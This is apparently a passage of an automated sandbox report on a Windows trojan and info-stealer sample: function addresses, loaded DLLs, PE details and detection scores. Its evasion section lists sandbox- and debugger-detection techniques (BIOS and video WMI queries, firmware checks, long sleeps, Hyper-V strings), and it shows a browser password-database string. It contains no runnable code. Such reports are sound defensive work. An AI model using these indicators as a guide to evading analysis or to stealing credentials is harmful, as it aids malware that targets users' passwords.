            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C2BFD00_3_00C2BFD0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C59FD90_3_00C59FD9
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C29F400_3_00C29F40
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C46F500_3_00C46F50
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C5BF720_3_00C5BF72
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0087614F0_2_0087614F
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0087679B0_2_0087679B
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_008841E00_2_008841E0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_008762860_2_00876286
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_008762F20_2_008762F2
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0087623C0_2_0087623C
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_008764070_2_00876407
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_008764400_2_00876440
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0088846B0_2_0088846B
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_008765640_2_00876564
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_008766EE0_2_008766EE
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_008746600_2_00874660
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_008668600_2_00866860
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0085C9900_2_0085C990
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_008889AF0_2_008889AF
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00854A000_2_00854A00
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0085ED300_2_0085ED30
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0088AD320_2_0088AD32
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00888EF30_2_00888EF3
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0084EE400_2_0084EE40
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0088310B0_2_0088310B
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0088735F0_2_0088735F
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_008835E00_2_008835E0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0087F7ED0_2_0087F7ED
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_008839B40_2_008839B4
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00883DC00_2_00883DC0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00875DDD0_2_00875DDD
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00875DF40_2_00875DF4
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0087BD020_2_0087BD02
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00889FD10_2_00889FD1
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0046069F0_2_0046069F
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_004600000_2_00460000
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 008748A0 appears 45 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 008744A5 appears 83 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 0084F570 appears 47 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 0084E1C0 appears 114 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 0085EB70 appears 65 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 00C398C0 appears 116 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 00842A80 appears 54 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 0087C2C8 appears 46 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 0084E170 appears 127 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 00859320 appears 110 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 00C2B0F0 appears 75 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 0085D790 appears 83 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 00874A8C appears 457 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 0084E660 appears 59 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 00842270 appears 507 times
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: String function: 00850D40 appears 42 times
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00460DAF CreateToolhelp32Snapshot,Thread32First,CloseHandle,0_2_00460DAF
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C638F0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,GetVolumeInformationW,0_3_00C638F0
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1374111572.000000000355F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeVirustotal: Detection: 15%
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeReversingLabs: Detection: 19%
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile read: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: d:\Programming\mpeg4\mp4v2-1.9.1\vstudio9.0\Release Static\mp4info.pdb source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00885F6B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00885F6B
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: real checksum: 0x121da6 should be: 0xd8bb6
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C4F5F1 push dword ptr [ecx]; iretd 0_3_00C4F5F6
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0087C30D push ecx; ret 0_2_0087C320
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00877BE2 push ecx; ret 0_2_00877BF5
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-44856
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe TID: 2296Thread sleep time: -210000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe TID: 2296Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeBinary or memory string: hHGFS
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1363440490.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1509913195.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509067999.0000000000659000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1509830243.000000000065C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeAPI call chain: ExitProcess graph end nodegraph_0-44811
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C6A1B0 LdrInitializeThunk,0_3_00C6A1B0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00874072 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00874072
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00885F6B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00885F6B
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0046069F mov edx, dword ptr fs:[00000030h]0_2_0046069F
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00460C5F mov eax, dword ptr fs:[00000030h]0_2_00460C5F
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0046100F mov eax, dword ptr fs:[00000030h]0_2_0046100F
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_004612AE mov eax, dword ptr fs:[00000030h]0_2_004612AE
